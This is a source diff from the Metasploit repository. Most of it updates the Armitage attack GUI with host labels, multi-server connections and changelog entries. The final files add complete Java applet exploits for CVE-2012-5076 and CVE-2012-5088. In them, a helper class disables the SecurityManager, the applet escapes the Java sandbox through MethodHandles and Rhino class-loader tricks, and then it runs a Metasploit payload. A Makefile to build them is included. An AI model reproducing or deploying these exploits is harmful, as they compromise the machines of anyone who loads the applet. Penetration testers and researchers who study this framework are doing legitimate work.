for (x = 0; x < scripts.length; x++) {
InputStream i = this.getClass().getClassLoader().getResourceAsStream(scripts[x]);
@ -161,6 +153,23 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
}
public static void main(String args[]) {
new ArmitageMain(args);
/* check for server mode option */
boolean serverMode = false;
int x = 0;
for (x = 0; x < args.length; x++) {
if (args[x].equals("--server"))
serverMode = true;
}
/* setup our armitage instance */
if (serverMode) {
new ArmitageMain(args, null, serverMode);
}
else {
MultiFrame.setupLookAndFeel();
MultiFrame frame = new MultiFrame();
new ArmitageMain(args, frame, serverMode);
}
}
}

60
external/source/armitage/src/armitage/EventLogTabCompletion.java vendored Normal file
View File

@ -0,0 +1,60 @@
package armitage;
import console.Console;
import msf.*;
import java.util.*;
import java.awt.*;
import java.awt.event.*;
import javax.swing.*;
import java.io.IOException;
public class EventLogTabCompletion extends GenericTabCompletion {
protected RpcConnection connection;
public EventLogTabCompletion(Console window, RpcConnection connection) {
super(window);
this.connection = connection;
}
public Collection getOptions(String text) {
try {
Map response = (Map)connection.execute("armitage.lusers", new Object[] {});
if (response.get("lusers") == null)
return null;
Iterator users = ((Collection)response.get("lusers")).iterator();
LinkedList options = new LinkedList();
String word;
String pre;
if (text.endsWith(" ")) {
word = "";
pre = text;
}
if (text.lastIndexOf(" ") != -1) {
word = text.substring(text.lastIndexOf(" ") + 1);
pre = text.substring(0, text.lastIndexOf(" ") + 1);
}
else {
word = text;
pre = "";
}
while (users.hasNext()) {
String user = users.next() + "";
if (user.startsWith(word)) {
options.add(pre + user);
}
}
return options;
}
catch (IOException ioex) {
ioex.printStackTrace();
}
return null;
}
}

5
external/source/armitage/src/cortana/Loader.java vendored
View File

@ -15,7 +15,7 @@ public class Loader implements Loadable {
protected ScriptLoader loader;
protected Hashtable shared = new Hashtable();
protected ScriptVariables vars = new ScriptVariables();
protected Object[] passMe = new Object[2];
protected Object[] passMe = new Object[3];
protected List scripts = new LinkedList();
public void unsetDebugLevel(int flag) {
@ -51,10 +51,11 @@ public class Loader implements Loadable {
}
}
public void passObjects(Object o, Object p) {
public void passObjects(Object o, Object p, Object q) {
synchronized (this) {
passMe[0] = o;
passMe[1] = p;
passMe[2] = q;
}
}

2
external/source/armitage/src/cortana/Main.java vendored
View File

@ -69,7 +69,7 @@ public class Main implements Runnable, CortanaPipe.CortanaPipeListener {
try {
Object conns[] = setupConnections(host, port, user, pass, nick);
//new MsgRpcImpl(user, pass, host, Integer.parseInt(port), true, false);
engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, host);
engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, (String)conns[2]);
new Thread(this).start();
}
catch (java.lang.RuntimeException rex) {

15
external/source/armitage/src/graph/NetworkGraph.java vendored
View File

@ -453,17 +453,26 @@ public class NetworkGraph extends JComponent implements ActionListener {
protected Map tooltips = new HashMap();
public Object addNode(String id, String label, Image image, String tooltip) {
public Object addNode(String id, String label, String description, Image image, String tooltip) {
nodeImages.put(id, image);
if (label.length() > 0) {
if (description.length() > 0) {
description += "\n" + label;
}
else {
description = label;
}
}
mxCell cell;
if (!nodes.containsKey(id)) {
cell = (mxCell)graph.insertVertex(parent, id, label, 0, 0, 125, 97);
cell = (mxCell)graph.insertVertex(parent, id, description, 0, 0, 125, 97);
nodes.put(id, cell);
}
else {
cell = (mxCell)nodes.get(id);
cell.setValue(label);
cell.setValue(description);
}
nodes.touch(id);

152
external/source/armitage/src/msf/DatabaseImpl.java vendored
View File

@ -14,11 +14,15 @@ public class DatabaseImpl implements RpcConnection {
protected String workspaceid = "0";
protected String hFilter = null;
protected String sFilter = null;
protected String[] lFilter = null;
protected Route[] rFilter = null;
protected String[] oFilter = null;
protected int hindex = 0;
protected int sindex = 0;
/* keep track of labels associated with each host */
protected Map labels = new HashMap();
/* define the maximum hosts in a workspace */
protected int maxhosts = 512;
@ -135,6 +139,20 @@ public class DatabaseImpl implements RpcConnection {
return false;
}
private boolean checkLabel(String host) {
if (!labels.containsKey(host))
return false;
String label_l = (labels.get(host) + "").toLowerCase();
for (int x = 0; x < lFilter.length; x++) {
if (label_l.indexOf(lFilter[x]) != -1) {
return true;
}
}
return false;
}
private boolean checkOS(String os) {
String os_l = os.toLowerCase();
@ -145,11 +163,76 @@ public class DatabaseImpl implements RpcConnection {
return false;
}
protected void loadLabels() {
try {
/* query database for label data */
List rows = executeQuery("SELECT DISTINCT data FROM notes WHERE ntype = 'armitage.labels'");
if (rows.size() == 0)
return;
/* extract our BASE64 encoded data */
String data = ((Map)rows.get(0)).get("data") + "";
System.err.println("Read: " + data.length() + " bytes");
/* turn our data into raw data */
byte[] raw = Base64.decode(data);
/* deserialize our notes data */
ByteArrayInputStream store = new ByteArrayInputStream(raw);
ObjectInputStream handle = new ObjectInputStream(store);
Map temp = (Map)(handle.readObject());
handle.close();
store.close();
/* merge with our new map */
labels.putAll(temp);
}
catch (Exception ex) {
ex.printStackTrace();
}
}
protected void mergeLabels(Map l) {
/* accept any label values and merge them into our global data set */
Iterator i = l.entrySet().iterator();
while (i.hasNext()) {
Map.Entry entry = (Map.Entry)i.next();
if ("".equals(entry.getValue())) {
labels.remove(entry.getKey() + "");
}
else {
labels.put(entry.getKey() + "", entry.getValue() + "");
}
}
}
/* add labels to our hosts */
public List addLabels(List rows) {
if (labels.size() == 0)
return rows;
Iterator i = rows.iterator();
while (i.hasNext()) {
Map entry = (Map)i.next();
String address = (entry.containsKey("address") ? entry.get("address") : entry.get("host")) + "";
if (labels.containsKey(address)) {
entry.put("label", labels.get(address) + "");
}
else {
entry.put("label", "");
}
}
return rows;
}
public List filterByRoute(List rows, int max) {
if (rFilter != null || oFilter != null) {
if (rFilter != null || oFilter != null || lFilter != null) {
Iterator i = rows.iterator();
while (i.hasNext()) {
Map entry = (Map)i.next();
/* make sure the address is within a route we care about */
if (rFilter != null && entry.containsKey("address")) {
if (!checkRoute(entry.get("address") + "")) {
i.remove();
@ -163,9 +246,26 @@ public class DatabaseImpl implements RpcConnection {
}
}
/* make sure the host is something we care about too */
if (oFilter != null && entry.containsKey("os_name")) {
if (!checkOS(entry.get("os_name") + ""))
if (!checkOS(entry.get("os_name") + "")) {
i.remove();
continue;
}
}
/* make sure the host has the right label */
if (lFilter != null && entry.containsKey("address")) {
if (!checkLabel(entry.get("address") + "")) {
i.remove();
continue;
}
}
else if (lFilter != null && entry.containsKey("host")) {
if (!checkLabel(entry.get("host") + "")) {
i.remove();
continue;
}
}
}
@ -180,6 +280,7 @@ public class DatabaseImpl implements RpcConnection {
public void connect(String dbstring, String user, String password) throws Exception {
db = DriverManager.getConnection(dbstring, user, password);
setWorkspace("default");
loadLabels();
}
public Object execute(String methodName) throws IOException {
@ -192,8 +293,8 @@ public class DatabaseImpl implements RpcConnection {
/* this is an optimization. If we have a network or OS filter, we need to pull back all host/service records and
filter them here. If we do not have these types of filters, then we can let the database do the heavy lifting
and limit the size of the final result there. */
int limit1 = rFilter == null && oFilter == null ? maxhosts : 30000;
int limit2 = rFilter == null && oFilter == null ? maxservices : 100000;
int limit1 = rFilter == null && oFilter == null && lFilter == null ? maxhosts : 30000;
int limit2 = rFilter == null && oFilter == null && lFilter == null ? maxservices : 100000;
temp.put("db.creds", "SELECT DISTINCT creds.*, hosts.address as host, services.name as sname, services.port as port, services.proto as proto FROM creds, services, hosts WHERE services.id = creds.service_id AND hosts.id = services.host_id AND hosts.workspace_id = " + workspaceid);
@ -209,13 +310,13 @@ public class DatabaseImpl implements RpcConnection {
if (hFilter.indexOf("sessions.") >= 0)
tables.add("sessions");
temp.put("db.hosts", "SELECT DISTINCT hosts.* FROM " + join(tables, ", ") + " WHERE hosts.workspace_id = " + workspaceid + " AND " + hFilter + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (limit1 * hindex));
temp.put("db.hosts", "SELECT DISTINCT hosts.id, hosts.updated_at, hosts.state, hosts.mac, hosts.purpose, hosts.os_flavor, hosts.os_name, hosts.address, hosts.os_sp FROM " + join(tables, ", ") + " WHERE hosts.workspace_id = " + workspaceid + " AND " + hFilter + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (limit1 * hindex));
}
else {
temp.put("db.hosts", "SELECT DISTINCT hosts.* FROM hosts WHERE hosts.workspace_id = " + workspaceid + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (hindex * limit1));
temp.put("db.hosts", "SELECT DISTINCT hosts.id, hosts.updated_at, hosts.state, hosts.mac, hosts.purpose, hosts.os_flavor, hosts.os_name, hosts.address, hosts.os_sp FROM hosts WHERE hosts.workspace_id = " + workspaceid + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (hindex * limit1));
}
temp.put("db.services", "SELECT DISTINCT services.*, hosts.address as host FROM services, (" + temp.get("db.hosts") + ") as hosts WHERE hosts.id = services.host_id AND services.state = 'open' ORDER BY services.id ASC LIMIT " + limit2 + " OFFSET " + (limit2 * sindex));
temp.put("db.services", "SELECT DISTINCT services.id, services.name, services.port, services.proto, services.info, services.updated_at, hosts.address as host FROM services, (" + temp.get("db.hosts") + ") as hosts WHERE hosts.id = services.host_id AND services.state = 'open' ORDER BY services.id ASC LIMIT " + limit2 + " OFFSET " + (limit2 * sindex));
temp.put("db.loots", "SELECT DISTINCT loots.*, hosts.address as host FROM loots, hosts WHERE hosts.id = loots.host_id AND hosts.workspace_id = " + workspaceid);
temp.put("db.workspaces", "SELECT DISTINCT * FROM workspaces");
temp.put("db.notes", "SELECT DISTINCT notes.*, hosts.address as host FROM notes, hosts WHERE hosts.id = notes.host_id AND hosts.workspace_id = " + workspaceid);
@ -235,7 +336,7 @@ public class DatabaseImpl implements RpcConnection {
result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxservices));
}
else if (methodName.equals("db.hosts")) {
result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxhosts));
result.put(methodName.substring(3), addLabels(filterByRoute(executeQuery(query), maxhosts)));
}
else {
result.put(methodName.substring(3), executeQuery(query));
@ -311,6 +412,10 @@ public class DatabaseImpl implements RpcConnection {
return new HashMap();
}
else if (methodName.equals("db.clear")) {
/* clear our local cache of labels */
labels = new HashMap();
/* clear the database */
executeUpdate(
"BEGIN;" +
"DELETE FROM hosts;" +
@ -332,6 +437,7 @@ public class DatabaseImpl implements RpcConnection {
rFilter = null;
oFilter = null;
lFilter = null;
List hosts = new LinkedList();
List srvcs = new LinkedList();
@ -385,6 +491,11 @@ public class DatabaseImpl implements RpcConnection {
oFilter = (values.get("os") + "").toLowerCase().split(",\\s*");
}
/* label filter */
if (values.containsKey("labels") && (values.get("labels") + "").length() > 0) {
lFilter = (values.get("labels") + "").toLowerCase().split(",\\s*");
}
if (hosts.size() == 0) {
hFilter = null;
}
@ -406,6 +517,31 @@ public class DatabaseImpl implements RpcConnection {
result.put("rows", new Integer(stmt.executeUpdate()));
return result;
}
else if (methodName.equals("db.report_labels")) {
/* merge out global label data */
Map values = (Map)params[0];
mergeLabels(values);
/* delete our saved label data */
executeUpdate("DELETE FROM notes WHERE notes.ntype = 'armitage.labels'");
/* serialize our notes data */
ByteArrayOutputStream store = new ByteArrayOutputStream(labels.size() * 128);
ObjectOutputStream handle = new ObjectOutputStream(store);
handle.writeObject(labels);
handle.close();
store.close();
String data = Base64.encode(store.toByteArray());
/* save our label data */
PreparedStatement stmt = null;
stmt = db.prepareStatement("INSERT INTO notes (ntype, data) VALUES ('armitage.labels', ?)");
stmt.setString(1, data);
stmt.executeUpdate();
return new HashMap();
}
else if (methodName.equals("db.report_host")) {
Map values = (Map)params[0];
String host = values.get("host") + "";

2
external/source/armitage/src/msf/RpcAsync.java vendored
View File

@ -32,7 +32,7 @@ public class RpcAsync implements RpcConnection, Async {
if (methodName.equals("module.info") || methodName.equals("module.options") || methodName.equals("module.compatible_payloads")) {
StringBuilder keysb = new StringBuilder(methodName);
for(int i = 1; i < params.length; i++)
for(int i = 0; i < params.length; i++)
keysb.append(params[i].toString());
String key = keysb.toString();

2
external/source/armitage/src/msf/RpcCacheImpl.java vendored
View File

@ -106,6 +106,8 @@ public class RpcCacheImpl implements Runnable {
key.append(temp.get("ports"));
key.append(";");
key.append(temp.get("session"));
key.append(";");
key.append(temp.get("labels"));
return key.toString();
}

28
external/source/armitage/src/msf/RpcConnectionImpl.java vendored
View File

@ -84,12 +84,40 @@ public abstract class RpcConnectionImpl implements RpcConnection, Async {
}
protected HashMap locks = new HashMap();
protected String address = "";
public String getLocalAddress() {
return address;
}
/** Adds token, runs command, and notifies logger on call and return */
public Object execute(String methodName, Object[] params) throws IOException {
if (database != null && "db.".equals(methodName.substring(0, 3))) {
return database.execute(methodName, params);
}
else if (methodName.equals("armitage.ping")) {
try {
long time = System.currentTimeMillis() - Long.parseLong(params[0] + "");
HashMap res = new HashMap();
res.put("result", time + "");
return res;
}
catch (Exception ex) {
HashMap res = new HashMap();
res.put("result", "0");
return res;
}
}
else if (methodName.equals("armitage.my_ip")) {
HashMap res = new HashMap();
res.put("result", address);
return res;
}
else if (methodName.equals("armitage.set_ip")) {
address = params[0] + "";
return new HashMap();
}
else if (methodName.equals("armitage.lock")) {
if (locks.containsKey(params[0] + "")) {
Map res = new HashMap();

2
external/source/armitage/src/msf/RpcQueue.java vendored
View File

@ -66,7 +66,7 @@ public class RpcQueue implements Runnable {
Thread.sleep(50);
}
else {
Thread.sleep(500);
Thread.sleep(200);
}
}
}

32
external/source/armitage/src/table/NetworkTable.java vendored
View File

@ -1,11 +1,11 @@
package table;
import javax.swing.*;
import javax.swing.event.*;
import javax.swing.*;
import javax.swing.event.*;
import javax.swing.border.*;
import javax.swing.table.*;
import java.awt.*;
import java.awt.*;
import java.awt.event.*;
import java.awt.image.*;
@ -52,7 +52,7 @@ public class NetworkTable extends JComponent implements ActionListener {
public NetworkTable(Properties display) {
this.display = display;
model = new GenericTableModel(new String[] { " ", "Address", "Description", "Pivot" }, "Address", 256);
model = new GenericTableModel(new String[] { " ", "Address", "Label", "Description", "Pivot" }, "Address", 256);
table = new ATable(model);
TableRowSorter sorter = new TableRowSorter(model);
sorter.toggleSortOrder(1);
@ -79,23 +79,24 @@ public class NetworkTable extends JComponent implements ActionListener {
};
sorter.setComparator(1, hostCompare);
sorter.setComparator(3, hostCompare);
sorter.setComparator(4, hostCompare);
table.setRowSorter(sorter);
table.setColumnSelectionAllowed(false);
table.getColumn("Address").setPreferredWidth(125);
table.getColumn("Label").setPreferredWidth(125);
table.getColumn("Pivot").setPreferredWidth(125);
table.getColumn(" ").setPreferredWidth(32);
table.getColumn(" ").setMaxWidth(32);
table.getColumn("Description").setPreferredWidth(500);
final TableCellRenderer parent = table.getDefaultRenderer(Object.class);
table.setDefaultRenderer(Object.class, new TableCellRenderer() {
final TableCellRenderer phear = new TableCellRenderer() {
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) {
JLabel component = (JLabel)parent.getTableCellRendererComponent(table, value, isSelected, false, row, col);
if (col == 3 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) {
if (col == 4 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) {
component.setFont(component.getFont().deriveFont(Font.BOLD));
}
else if (col == 1 && !"".equals(model.getValueAt(table, row, "Description"))) {
@ -110,9 +111,15 @@ public class NetworkTable extends JComponent implements ActionListener {
if (tip.length() > 0) {
component.setToolTipText(tip);
}
return component;
}
});
};
table.getColumn("Address").setCellRenderer(phear);
table.getColumn("Label").setCellRenderer(phear);
table.getColumn("Description").setCellRenderer(phear);
table.getColumn("Pivot").setCellRenderer(phear);
table.getColumn(" ").setCellRenderer(new TableCellRenderer() {
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) {
@ -252,16 +259,17 @@ public class NetworkTable extends JComponent implements ActionListener {
public void addActionForKeySetting(String key, String dvalue, Action action) {
}
public Object addNode(String id, String label, Image image, String tooltip) {
public Object addNode(String id, String label, String description, Image image, String tooltip) {
if (id == null || label == null)
return null;
HashMap map = new HashMap();
map.put("Address", id);
if (label.indexOf(id) > -1)
label = label.substring(id.length());
map.put("Description", label);
if (description.indexOf(id) > -1)
description = description.substring(id.length());
map.put("Label", label);
map.put("Description", description);
map.put("Tooltip", tooltip);
map.put("Image", image);
map.put(" ", tooltip);

6
external/source/armitage/src/ui/ATable.java vendored
View File

@ -26,6 +26,12 @@ public class ATable extends JTable {
specialitems.add("WORDLIST");
specialitems.add("SESSION");
specialitems.add("REXE");
specialitems.add("EXE::Custom");
specialitems.add("EXE::Template");
specialitems.add("USERNAME");
specialitems.add("PASSWORD");
specialitems.add("SMBUser");
specialitems.add("SMBPass");
return new TableCellRenderer() {
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) {

238
external/source/armitage/src/ui/MultiFrame.java vendored Normal file
View File

@ -0,0 +1,238 @@
package ui;
import javax.swing.*;
import javax.swing.event.*;
import java.awt.*;
import java.awt.event.*;
import java.util.*;
import armitage.ArmitageApplication;
import msf.*;
/* A class to host multiple Armitage instances in one frame. Srsly */
public class MultiFrame extends JFrame implements KeyEventDispatcher {
protected JToolBar toolbar;
protected JPanel content;
protected CardLayout cards;
protected LinkedList buttons;
private static class ArmitageInstance {
public ArmitageApplication app;
public JToggleButton button;
public RpcConnection client;
}
public Map getClients() {
synchronized (buttons) {
Map r = new HashMap();
Iterator i = buttons.iterator();
while (i.hasNext()) {
ArmitageInstance temp = (ArmitageInstance)i.next();
r.put(temp.button.getText(), temp.client);
}
return r;
}
}
public void setTitle(ArmitageApplication app, String title) {
if (active == app)
setTitle(title);
}
protected ArmitageApplication active;
/* is localhost running? */
public boolean checkLocal() {
synchronized (buttons) {
Iterator i = buttons.iterator();
while (i.hasNext()) {
ArmitageInstance temp = (ArmitageInstance)i.next();
if ("localhost".equals(temp.button.getText())) {
return true;
}
}
return false;
}
}
public boolean dispatchKeyEvent(KeyEvent ev) {
if (active != null) {
return active.getBindings().dispatchKeyEvent(ev);
}
return false;
}
public static final void setupLookAndFeel() {
try {
for (UIManager.LookAndFeelInfo info : UIManager.getInstalledLookAndFeels()) {
if ("Nimbus".equals(info.getName())) {
UIManager.setLookAndFeel(info.getClassName());
break;
}
}
}
catch (Exception e) {
}
}
public void closeConnect() {
synchronized (buttons) {
if (buttons.size() == 0) {
System.exit(0);
}
}
}
public void quit() {
synchronized (buttons) {
ArmitageInstance temp = null;
content.remove(active);
Iterator i = buttons.iterator();
while (i.hasNext()) {
temp = (ArmitageInstance)i.next();
if (temp.app == active) {
toolbar.remove(temp.button);
i.remove();
break;
}
}
if (buttons.size() == 0) {
System.exit(0);
}
else if (buttons.size() == 1) {
remove(toolbar);
validate();
}
if (i.hasNext()) {
temp = (ArmitageInstance)i.next();
}
else {
temp = (ArmitageInstance)buttons.getFirst();
}
set(temp.button);
}
}
public MultiFrame() {
super("");
setLayout(new BorderLayout());
/* setup our toolbar */
toolbar = new JToolBar();
/* content area */
content = new JPanel();
cards = new CardLayout();
content.setLayout(cards);
/* setup our stuff */
add(content, BorderLayout.CENTER);
/* buttons?!? :) */
buttons = new LinkedList();
/* do this ... */
setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
/* some basic setup */
setSize(800, 600);
setExtendedState(JFrame.MAXIMIZED_BOTH);
/* all your keyboard shortcuts are belong to me */
KeyboardFocusManager.getCurrentKeyboardFocusManager().addKeyEventDispatcher(this);
}
protected void set(JToggleButton button) {
synchronized (buttons) {
/* set all buttons to the right state */
Iterator i = buttons.iterator();
while (i.hasNext()) {
ArmitageInstance temp = (ArmitageInstance)i.next();
if (temp.button.getText().equals(button.getText())) {
temp.button.setSelected(true);
active = temp.app;
setTitle(active.getTitle());
}
else {
temp.button.setSelected(false);
}
}
/* show our cards? */
cards.show(content, button.getText());
active.touch();
}
}
public void addButton(String title, final ArmitageApplication component, RpcConnection conn) {
synchronized (buttons) {
final ArmitageInstance a = new ArmitageInstance();
a.button = new JToggleButton(title);
a.button.setToolTipText(title);
a.app = component;
a.client = conn;
a.button.addActionListener(new ActionListener() {
public void actionPerformed(ActionEvent ev) {
set((JToggleButton)ev.getSource());
}
});
a.button.addMouseListener(new MouseAdapter() {
public void check(MouseEvent ev) {
if (ev.isPopupTrigger()) {
final JToggleButton source = a.button;
JPopupMenu popup = new JPopupMenu();
JMenuItem rename = new JMenuItem("Rename");
rename.addActionListener(new ActionListener() {
public void actionPerformed(ActionEvent ev) {
String name = JOptionPane.showInputDialog("Rename to?", source.getText());
if (name != null) {
content.remove(component);
content.add(component, name);
source.setText(name);
set(source);
}
}
});
popup.add(rename);
popup.show((JComponent)ev.getSource(), ev.getX(), ev.getY());
ev.consume();
}
}
public void mouseClicked(MouseEvent ev) {
check(ev);
}
public void mousePressed(MouseEvent ev) {
check(ev);
}
public void mouseReleased(MouseEvent ev) {
check(ev);
}
});
toolbar.add(a.button);
content.add(component, title);
buttons.add(a);
set(a.button);
if (buttons.size() == 1) {
show();
}
else if (buttons.size() == 2) {
add(toolbar, BorderLayout.SOUTH);
}
validate();
}
}
}

2
external/source/armitage/src/ui/ZoomableImage.java vendored
View File

@ -54,6 +54,8 @@ public class ZoomableImage extends JLabel {
check(ev);
}
});
setHorizontalAlignment(SwingConstants.CENTER);
}
protected void updateIcon() {

49
external/source/armitage/whatsnew.txt vendored
View File

@ -1,6 +1,55 @@
Armitage Changelog
==================
12 Feb 13 (tested against msf 16438)
---------
- Fixed a corner case preventing the display of removed host labels
when connected to a team server.
- Fixed RPC call cache corruption in team server mode. This bug could
lead to some exploits defaulting to a shell payload when meterpreter
was a possibility.
- Slight optimization to some DB queries. I no longer pull unused
fields making the query marginally faster. Team server is more
efficient too as changes to unused fields won't force data (re)sync.
- Hosts -> Clear Database now clears host labels too.
- Added the ability to manage multiple team server instances through
Armitage. Go to Armitage -> New Connection to connect to another
server. A button bar will appear that allows you to switch active
Armitage connections.
- Credentials available across instances are pooled when using
the [host] -> Login menu and the credential helper.
- Rewrote the event log management code in the team server
- Added nickname tab completion to event log. I feel like I'm writing
an IRC client again.
- Hosts -> Clear Database now asks you to confirm the action.
- Hosts -> Import Hosts announces successful import to event log again.
23 Jan 13 (tested against msf 16351)
---------
- Added helpers to set EXE::Custom and EXE::Template options.
- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts
- Cleaned up Armitage -> SOCKS Proxy job management code. The code to
check if a proxy server is up was deadlock prone. Removed it.
- Starting SOCKS Proxy module now opens a tab displaying the module
start process. An event is posted to the event log too.
- Created an option helper to select credentials for SMBUser, SMBPass,
USERNAME, and PASSWORD.
- Added a feature to label hosts. A label will show up in its own column
in table view or below all info in graph view. Any team member may
change a label through [host] -> host -> Set Label. You may also use
dynamic workspaces to show hosts with certain labels attached.
- Fixed bad things happening when connecting Armitage to 'localhost' and
not '127.0.0.1'.
- Screenshots and Webcam shots are now centered in their tab.
- Added an alternate .bat file to start msfrpcd on Windows in the
Metasploit 4.5 installer's environment.
- Added a color-style for [!] warning messages
Cortana Updates (for scripters)
--------
- &handler function now works as advertised.
- Cortana now avoids use of core.setg
4 Jan 13 (tested against msf 16252)
--------
- Added a helper to set REXE option

19
external/source/exploits/cve-2012-5076_2/B.java vendored Executable file
View File

@ -0,0 +1,19 @@
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
public class B
implements PrivilegedExceptionAction
{
public B()
{
try
{
AccessController.doPrivileged(this); } catch (Exception e) {
}
}
public Object run() {
System.setSecurityManager(null);
return new Object();
}
}

78
external/source/exploits/cve-2012-5076_2/Exploit.java vendored Executable file
View File

@ -0,0 +1,78 @@
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import metasploit.Payload;
//import java.lang.Runtime;
import java.applet.Applet;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.Method;
import com.sun.org.glassfish.external.statistics.impl.*;
public class Exploit extends Applet
{
public static MethodHandles.Lookup test0;
public Exploit()
{
}
public void init()
{
try
{
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] buffer = new byte[8192];
int length;
// read in the class file from the jar
InputStream is = getClass().getResourceAsStream("B.class");
// and write it out to the byte array stream
while( ( length = is.read( buffer ) ) > 0 )
bos.write( buffer, 0, length );
// convert it to a simple byte array
buffer = bos.toByteArray();
Class c = Class.forName("java.lang.invoke.MethodHandles");
Method m = c.getMethod("lookup", new Class[0]);
AverageRangeStatisticImpl Avrg = new AverageRangeStatisticImpl(0,0,0,"","","",0,0);
MethodHandles.Lookup test = (MethodHandles.Lookup)Avrg.invoke(null, m, new Object[0]);
MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
MethodHandle localMethodHandle0 = test.findStatic(Class.class, "forName", localMethodType0);
Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
// Instance of sun.org.mozilla.javascript.internal.Context
MethodType localMethodType1 = MethodType.methodType(Void.TYPE);
MethodHandle localMethodHandle1 = test.findConstructor(localClass1, localMethodType1);
Object localObject1 = localMethodHandle1.invokeWithArguments(new Object[0]);
// Context.createClassLoader
MethodType localMethodType2 = MethodType.methodType(localClass2, ClassLoader.class);
MethodHandle localMethodHandle2 = test.findVirtual(localClass1, "createClassLoader", localMethodType2);
Object localObject2 = localMethodHandle2.invokeWithArguments(new Object[] { localObject1, null });
// GeneratedClassLoader.defineClass
MethodType localMethodType3 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
MethodHandle localMethodHandle3 = test.findVirtual(localClass2, "defineClass", localMethodType3);
Class localClass3 = (Class)localMethodHandle3.invokeWithArguments(new Object[] { localObject2, null, buffer });
//New instance of the helper Class
localClass3.newInstance();
Payload.main(null);
//Runtime.getRuntime().exec("calc.exe");
}
catch(Throwable ex)
{
//ex.printStackTrace();
}
}
}

18
external/source/exploits/cve-2012-5076_2/Makefile vendored Executable file
View File

@ -0,0 +1,18 @@
# rt.jar must be in the classpath!
CLASSES = \
Exploit.java \
B.java
.SUFFIXES: .java .class
.java.class:
javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
all: $(CLASSES:.java=.class)
install:
mv Exploit.class ../../../../data/exploits/cve-2012-5076_2/
mv B.class ../../../../data/exploits/cve-2012-5076_2/
clean:
rm -rf *.class

19
external/source/exploits/cve-2012-5088/B.java vendored Executable file
View File

@ -0,0 +1,19 @@
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
public class B
implements PrivilegedExceptionAction
{
public B()
{
try
{
AccessController.doPrivileged(this); } catch (Exception e) {
}
}
public Object run() {
System.setSecurityManager(null);
return new Object();
}
}

66
external/source/exploits/cve-2012-5088/Exploit.java vendored Executable file
View File

@ -0,0 +1,66 @@
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import metasploit.Payload;
//import java.lang.Runtime;
import java.applet.Applet;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.Method;
public class Exploit extends Applet
{
public Exploit()
{
}
public void init()
{
try
{
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] buffer = new byte[8192];
int length;
// read in the class file from the jar
InputStream is = getClass().getResourceAsStream("B.class");
// and write it out to the byte array stream
while( ( length = is.read( buffer ) ) > 0 )
bos.write( buffer, 0, length );
// convert it to a simple byte array
buffer = bos.toByteArray();
MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
MethodHandle localMethodHandle0 = localLookup.findStatic(Class.class, "forName", localMethodType0);
Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
localClass3.newInstance();
Payload.main(null);
//Runtime.getRuntime().exec("calc.exe");
}
catch(Throwable ex)
{
//ex.printStackTrace();
}
}
}

16
